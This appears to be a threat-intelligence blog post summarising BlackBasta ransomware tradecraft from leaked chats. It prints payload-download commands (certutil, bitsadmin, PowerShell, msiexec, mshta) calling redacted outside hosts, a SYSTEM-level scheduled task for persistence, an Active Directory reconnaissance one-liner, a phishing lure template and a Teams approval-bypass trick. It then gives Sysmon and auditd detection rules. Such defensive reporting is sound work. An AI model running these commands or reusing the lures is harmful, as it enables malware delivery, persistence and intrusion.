Update to the BlackBasta Post

Listen to this Post

Like a lot of threat actors, BlackBasta heavily used LOLBins in their attacks. Here are a few examples:

Certutil

certutil -urlcache -split -f https://REDACTED/gm68CGjX C:\Users\Public\payload.exe

WMIC

WMIC /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List

Bitsadmin

bitsadmin /transfer payload https://REDACTED/gKWi39HB C:\Users\Public\malware.exe

Schtasks

schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f

PowerShell – AD Recon

powershell -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"

PowerShell – Download Malicious DLL

powershell iwr http://REDACTED:801/download/HK_DNS_x64_n1_x64_inf.dll -outfile C:\Users\Public\HK_DNS_x64_n1_x64_inf.dll

MSIExec

msiexec /i https://REDACTED/gH4TzsYk /quiet /qn /norestart

Cscript / Wscript

cscript C:\Users\Public\payload.vbs
wscript C:\Users\Public\payload.vbs

MSHTA

mshta https://REDACTED/g_z3-eZh

Rundll32

rundll32.exe C:\users\public\35S44386.xls,ReleaseImage

RMM Tools

The dataset also mentions the usage of the following RMM tools:
– AnyDesk
– TeamViewer
– Syncro
– Wise RMM
– Tactical RMM
– MeshCentral

Example from the logs:

[text]
Russian “вы какой rmm юзали ? синкро и вайз Сейчас доступ на синкро сохранился”
English “What rmm did you use? syncro and wise Now access to syncro is preserved”
[/text]

Initial Access

Stolen credentials / Cred stuffing were discussed including RDP / VPN / Cpanel etc.

Phishing with fake data breach notifications:

[text]
“We will use our spam engine, the one we used to infect you in the first place, sending a neat, nicely written message:

Hello, this is Whafh – we are sending a follow up to the recent email on disclosing a data breach (because I am sure you sent one to your clients as you are obligated by the law to do so).
In the attached document, you can see further information about the breach, and an audit of exposure.”
[/text]

MSTeams Social Engineering

[text]

Sending target user MRI TWICE to create a “group chat” in order to bypass “external user message approval” prompt

See https://REDACTED/gjAMU_V4

[/text]

0-Days

The group also mentioned leveraging several of the larger 0-day exploits targeting network devices from the past few months:
– Juniper SRX Firewall Unauthenticated RCE
– SonicPanel RCE
– Palo 0-day CVE-2024-3400 back in April. They were offering a working exploit for 15k.

What Undercode Say

The BlackBasta group’s use of LOLBins (Living Off the Land Binaries) highlights the importance of monitoring legitimate system tools for malicious activity. Certutil, WMIC, Bitsadmin, and PowerShell are often exploited by attackers to download payloads, execute commands, and perform reconnaissance. Defenders should focus on detecting anomalous usage of these tools, such as Certutil being used to download files from external URLs or PowerShell executing unusual scripts.

For Linux defenders, similar techniques can be detected using tools like `auditd` to monitor command-line activity:

auditctl -a always,exit -F arch=b64 -S execve -k suspicious_commands

Windows defenders can use Sysmon to track LOLBin usage:

<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains">certutil</CommandLine>
<CommandLine condition="contains">bitsadmin</CommandLine>
<CommandLine condition="contains">powershell</CommandLine>
</ProcessCreate>
</RuleGroup>

For RMM tools, ensure that only authorized software is installed and monitor for unusual remote connections. Use firewall rules to restrict access to RMM tools from untrusted IPs.

Phishing remains a significant threat. Implement email filtering solutions and educate users on identifying suspicious emails. For MSTeams, enforce strict policies for external communication and monitor for unusual group chat creation.

Finally, patch management is critical to mitigate 0-day exploits. Regularly update network devices and apply vendor patches as soon as they are released. Use intrusion detection systems (IDS) to monitor for exploit attempts:

suricata -c /etc/suricata/suricata.yaml -i eth0

Stay vigilant and continuously update your defenses to counter evolving threats.

**Relevant URLs:**

References:

Hackers Feeds, Undercode AIFeatured Image